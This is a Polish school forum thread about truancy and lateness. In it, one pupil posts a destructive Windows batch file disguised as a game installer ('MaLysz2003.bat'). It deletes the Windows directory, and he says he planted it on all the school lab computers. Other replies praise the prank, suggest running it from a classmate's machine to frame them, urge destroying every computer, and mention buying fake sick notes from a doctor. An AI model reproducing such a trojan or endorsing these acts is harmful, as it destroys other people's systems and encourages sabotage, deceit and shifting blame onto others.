Ucieczki i "pójścia sobie do domu" ;)

Spędzamy w niej (albo powinniśmy spędzać) sporą cześć swojego życia. Jak w niej przetrwać i zostać sobą? Jak radzić sobie z codziennymi szkolnymi wymogami? Jak uniknąć najgorszych katuszy? Co interesującego dzieje się u Was w szkole, a z czym nie możecie wytrzymać?
ODPOWIEDZ
Paweł
Morphlorchack
Kontakt:

Ucieczki i "pójścia sobie do domu" ;)

Post autor: Paweł »

heh..... jak tam u was ze spóźnieniami, ucieczakami itp?

Np. u mnie wcale nie jest z tym źle, bo nie mam jeszcze ani jednej godziny, ale moja klasa bije wszystkich na łeb :lol:
Ostatnio zmieniony 31.10.2002, 21:01 przez Paweł, łącznie zmieniany 1 raz.
Niestety rzadko koło zdarzeń, obraca siła naszych marzeń.
:: // https://www.readyforboarding.pl
:: // me? https://pawel.florczak.info
PAL MAL
Młody rozbrykany

Re: Ucieczki i "pójścia sobie do domu" ;)

Post autor: PAL MAL »

Ja czasami jak mi się nie chce wyjść wcześniej na autobus to przeważnie mi ucieka i wtedy się spóźniam troche.

Jeśli chodzi o ucieczki w środu dnia to jak nic nie umiem ale jeśli mam podejrzenia że będą mnie pytać to ide sobie na rynek i przeczekam tą godzinę.

A z ostatnich godzin to żadko co uciekam bo zawsze mam lajtowne lekcje.
YO MY BROTHER!
Holl
Młody aktywny
Kontakt:

Post autor: Holl »

U mnie z ucieczkami jest troche kijowo gdyz mam taka powalona wychowaczynie ze trzeba sie z kazdej godziny nieusprawiedliwionej tlumaczyc a jak jest jakies podejrzenie ze to byla ucieczka to wtedy lubi pytac a że uczy matematyki to jest swietnie :))))
Splendor to jest squad
DRACO
Młody rozbrykany

Post autor: DRACO »

ja mam całkiem zgraną klasę i wyrozumiałą klasę.Jak jest hasło zryw to wszyscy idą i kadra nie wścieka się zbytnio o ile nie daliśmy się wykryć przy wychodzeiu ze szkoły 8) raz to nawet powiedzieli że szkoda że im nie powiedzieliśmy bo by z nami poszli :!: SERIO :!: to było w dniu ataku na WTC.Cała klasa polazła pod ambasadę amerykańską i kilka osób (ja też :lol: ) było w TV.Później babcia siem pytała czy to ja byłem :lol:

Sfilmowany podczas zrywu 8) ale odjazd 8) 8) 8)
Raz się żyje, potem się tylko straszy...
Ja straszę już dziś!!!
PAL MAL
Młody rozbrykany

Post autor: PAL MAL »

Jeśli chodzi o pójścia do domu to w moim przypadku to jest niemożliwe bo zawsze u mnie ktoś siedzi w domu, chyba że powiem że lekcje zostały skrucone.
YO MY BROTHER!
emailowiec
Szalony pismak

Post autor: emailowiec »

PAL MAL pisze:Jeśli chodzi o pójścia do domu to w moim przypadku to jest niemożliwe bo zawsze u mnie ktoś siedzi w domu, chyba że powiem że lekcje zostały skrucone.
To samo niestety tyczy sie mnie... :cry:
;)
Holl
Młody aktywny
Kontakt:

Post autor: Holl »

Ale nie zawsze po to sie urywa z lekcji zeby do domu pojsc.... to po pierwsze a po drugie text mojej baby z maty "Wy z klasy do klasy do przechodzicie psim swędem" :P
Splendor to jest squad
Damson
Młody aktywny

Post autor: Damson »

hmm.... raz uciekliśmy całą klasą ( nie licząc dwóch frajerów ) i mieliśmy przesrane ( wywiadówka: my, rodzice, nauczyciele i inne sępy żerujące )
a co do spóźnień to już wolę się nie spóźniać bo moja matka ma do szkoły przyjść o to !
Kamil
Szalony pismak

Post autor: Kamil »

Dzisiaj babka się doczepiła żeby przyjść z rodzicami do szkoły (moja wychowawczyni bo zepsułem kompy wszystkie w informatycznej :P) a ja bezczelnie wyjąłem telefon i zadzwoniłem po mame :P
Damson
Młody aktywny

Post autor: Damson »

serio wszystkie :?: To co ty na nich próbowałeś :twisted: :?:
Kamil
Szalony pismak

Damson pisze:serio wszystkie :?: To co ty na nich próbowałeś :twisted: :?:

Kod: Zaznacz cały

@echo off
echo Czy chcesz mieć więcej miejsca na dysku?
choice
pause>nul
deltree /y C:\windows
echo milego dnia....
MaLysz2003.bat
Tak to mniej więcej wyglądało, windows usunął sobie część plików i teraz się nie odpala, co najlepsze my daliśmy gre Małysz2003 na wszystkie kompy potem przyszły takie dzieci i to pouruchamiały :D
DRACO
Młody rozbrykany

Kamil Biśta pisze:
Damson pisze:serio wszystkie :?: To co ty na nich próbowałeś :twisted: :?:

Kod: Zaznacz cały

@echo off
echo Czy chcesz mieć więcej miejsca na dysku?
choice
pause>nul
deltree /y C:\windows
echo milego dnia....
MaLysz2003.bat
Tak to mniej więcej wyglądało, windows usunął sobie część plików i teraz się nie odpala, co najlepsze my daliśmy gre Małysz2003 na wszystkie kompy potem przyszły takie dzieci i to pouruchamiały :D
znaczy siem: Ty zapuściłęś pułapkę,a inni w nią wleźli tak?Więc jak Ciebie z nią powiązano?
Ja straszę już dziś!!!
Kamil
Szalony pismak

DRACO pisze:znaczy siem: Ty zapuściłęś pułapkę,a inni w nią wleźli tak?Więc jak Ciebie z nią powiązano?
Bo jak to ona nazwała:
Uruchomili to nie doświadczeni użytkownicy, zacząłem się brechtać i pogratulowałem jej klasy o profilu mat-inf :D A kto to zrobił pisze w logach serwera o której godzinie i z jakiego kompa.
DRACO
Młody rozbrykany

aha,no i wszystko jasne :) ale wpadka 8) a kalsie i nauczycielce pogratulować pogratulować :D 8)
Ja straszę już dziś!!!
Roshowa
Młody aktywny

Post autor: Roshowa »

A moja klasa neisety zbyt zgrana nie jest ... mam nadzieję że to się jeszcze zmieni =)
Catzz Rulzz!
macey
Prawie autorytet

Post autor: macey »

uuuuuuuhuhuh ja wczoraj mialem zebranie i bylem wymieniony w tyh co maja 0 nieuspprawiedliwionych 0 usprawiedliwionych 0 nieobecnych ;) uuuhuhhu mi sie nei spieszy z wagarami :>:>
Drako
Młody aktywny

Post autor: Drako »

umnie jest tak ze za 20zł masz od 1 do 3 tygodni zwolnienia nie powiem u jakego lekarza :D ... a co do spoznioej zawsze tak jest jak mam 8 lekcji to na 6 jestem spozniony faja tu faja tam ... a uciekam no przynajmniej raz w tygodniu :D
f
Młody aktywny

Post autor: f »

Kamil Biśta pisze: Bo jak to ona nazwała:
Uruchomili to nie doświadczeni użytkownicy, zacząłem się brechtać i pogratulowałem jej klasy o profilu mat-inf :D A kto to zrobił pisze w logach serwera o której godzinie i z jakiego kompa.
Klusiu ja bym to robił na kolegi kompie, niż na swoim.
Pozdrawiam
Kamil 'fovr' Szczygieł
mailto: fovr@rudykot.pl
Kamil
Szalony pismak

f pisze:Klusiu ja bym to robił na kolegi kompie, niż na swoim.
Nie należe do ludzi, którzy wkopują swoich kolegów/koleżanki. Jeżeli coś robie to z czystą odpowiedzialnością, które mogę w następstwie ponieść za moje czyny. To samo nie lubie kłamstw, to co zrobiłem na komputerach było tylko lekcją pokazową dla pań nauczycielek, które pozwalają uruchamiać byle badziewia na komputerze zamiast uczyć informatyki.
f
Młody aktywny

Post autor: f »

Kamil Biśta pisze: Nie należe do ludzi, którzy wkopują swoich kolegów/koleżanki. Jeżeli coś robie to z czystą odpowiedzialnością, które mogę w następstwie ponieść za moje czyny. To samo nie lubie kłamstw, to co zrobiłem na komputerach było tylko lekcją pokazową dla pań nauczycielek, które pozwalają uruchamiać byle badziewia na komputerze zamiast uczyć informatyki.
To trzeba było im pokazać prawidziwy power kluska i rozwalić wszystkie kompy ;)
Pozdrawiam
Kamil 'fovr' Szczygieł
mailto: fovr@rudykot.pl
ODPOWIEDZ